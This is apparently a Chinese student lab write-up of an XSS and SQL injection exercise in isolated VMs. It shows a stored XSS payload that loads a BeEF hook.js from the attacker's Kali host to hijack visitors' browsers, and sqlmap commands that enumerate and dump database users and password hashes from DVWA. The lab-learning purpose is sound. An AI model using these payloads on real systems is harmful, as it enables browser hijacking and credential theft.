渗透实验 XSS和SQL注入(Lab3.0)

Back~~2023-12-24 8:26

windows server2003IIS搭建

配置2003的虚拟机


1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。

2、 Kali使用beef生成恶意代码

cpp 复制代码 
cd /usr/share/beef-xss
cpp 复制代码 
./beef

执行上面两条命令

账户是beef

密码是之前自己设置好的

hook.js里面有自带的恶意代码

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板

cpp 复制代码 
<script src="http://Kali的IP地址:3000/hook.js"></script>


4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置。

左边就是别人的IP

右边就是可以控制浏览器的转跳,这里我跳的是百度

5、回答问题:实验中XSS攻击属于哪种类型?

存储型

XSS

SQL注入部分:DVWA+SQLmap+Mysql注入实战

实验环境搭建

打开Metasploitable2后,里面有搭建好的DVWA,访问http://Metasploitable的IP/dvwa (可能需要先扫描一下内网的ip,确定Metasploitable2的ip地址)并且把安全等级设置为最低

此时可以断定有SQL注入漏洞

cpp 复制代码 
http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#

2、枚举当前使用的数据库名称和用户名。

cpp 复制代码 
sqlmap语法参数
-u:指定目标URL
--cookie:当前会话的cookies值
-b:获取数据库类型,检查数据库管理系统标识
--current-db:获取当前数据库
--current-user:获取当前数据库使用的用户
--string:当查询可用时用来匹配页面中的字符串
--users:枚举DBMS用户
-password:枚举DBMS用户密码hash
cpp 复制代码 
sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' -b --current-db --current-user

注意你cookie ,还有你的文件路径是否一样

3、枚举数据库用户名和密码

cpp 复制代码 
sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' --users --password

4、枚举数据库

--dbs:枚举当前数据库

cpp 复制代码 
sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' --dbs

5、枚举数据库和指定数据库的数据表

-D 数据库名:指定数据库

--tables:枚举指定数据库的所有表

cpp 复制代码 
sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' -D "dvwa" --tables

6、获取指定数据库和表中所有列的信息

-D:指定的数据库

-T:指定数据库中的数据表

--columns:获取列的信息

cpp 复制代码 
sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' -D "dvwa" -T users --columns

7、枚举指定数据表中的所有用户名与密码,并down到本地。

-C:枚举数据表中的列

cpp 复制代码 
--dump:存储sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' -D "dvwa" -T users -C "user_id,user,password" --dump
相关推荐
行思理12 分钟前
Docker 应该如何学习 分四个阶段
学习·docker·容器
大山同学25 分钟前
Blender学习-基础移动
数码相机·学习·blender
电子云与长程纠缠27 分钟前
Blender入门学习05 - 材质
学习·blender·材质
机器学习之心1 小时前
PSO-Transformer-BiLSTM分类预测/故障诊断,优化参数为注意力机制头数、学习率、正则化系数、隐藏层单元,图很多,包括分类效果图,混淆矩阵图
学习·分类·transformer·pso-transformer
摘星编程2 小时前
【成长纪实】HarmonyOS Next学习地图:新手避坑指南与核心知识点拆解
学习·华为·harmonyos·鸿蒙开发
deng-c-f5 小时前
Linux C/C++ 学习日记(32):协程(二):Ntyco源码解析
学习·协程·ntyco
Voyager_46 小时前
算法学习记录08——并归的应用(LeetCode[315])
学习·算法·leetcode
deng-c-f7 小时前
Linux C/C++ 学习日记(35):协程(五):同步、多线程、多协程在IO密集型场景中的性能测试
学习·线程·协程·同步·性能
Webb Yu7 小时前
加密货币学习路径
学习·区块链
Han.miracle7 小时前
数据库圣经-----最终章JDBC
java·数据库·学习·maven·database
热门推荐
01GitHub 镜像站点02BongoCat - 跨平台键盘猫动画工具03UV安装并设置国内源04GitLab 零基础入门指南:从安装到项目管理全流程05Linux下V2Ray安装配置指南06Burp与其他安全工具联动及代理设置教程07jdk21下载、安装(Windows、Linux、macOS)08Labelme从安装到标注:零基础完整指南09NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南10HTML5 敲击乐:从零搭建交互式前端音乐项目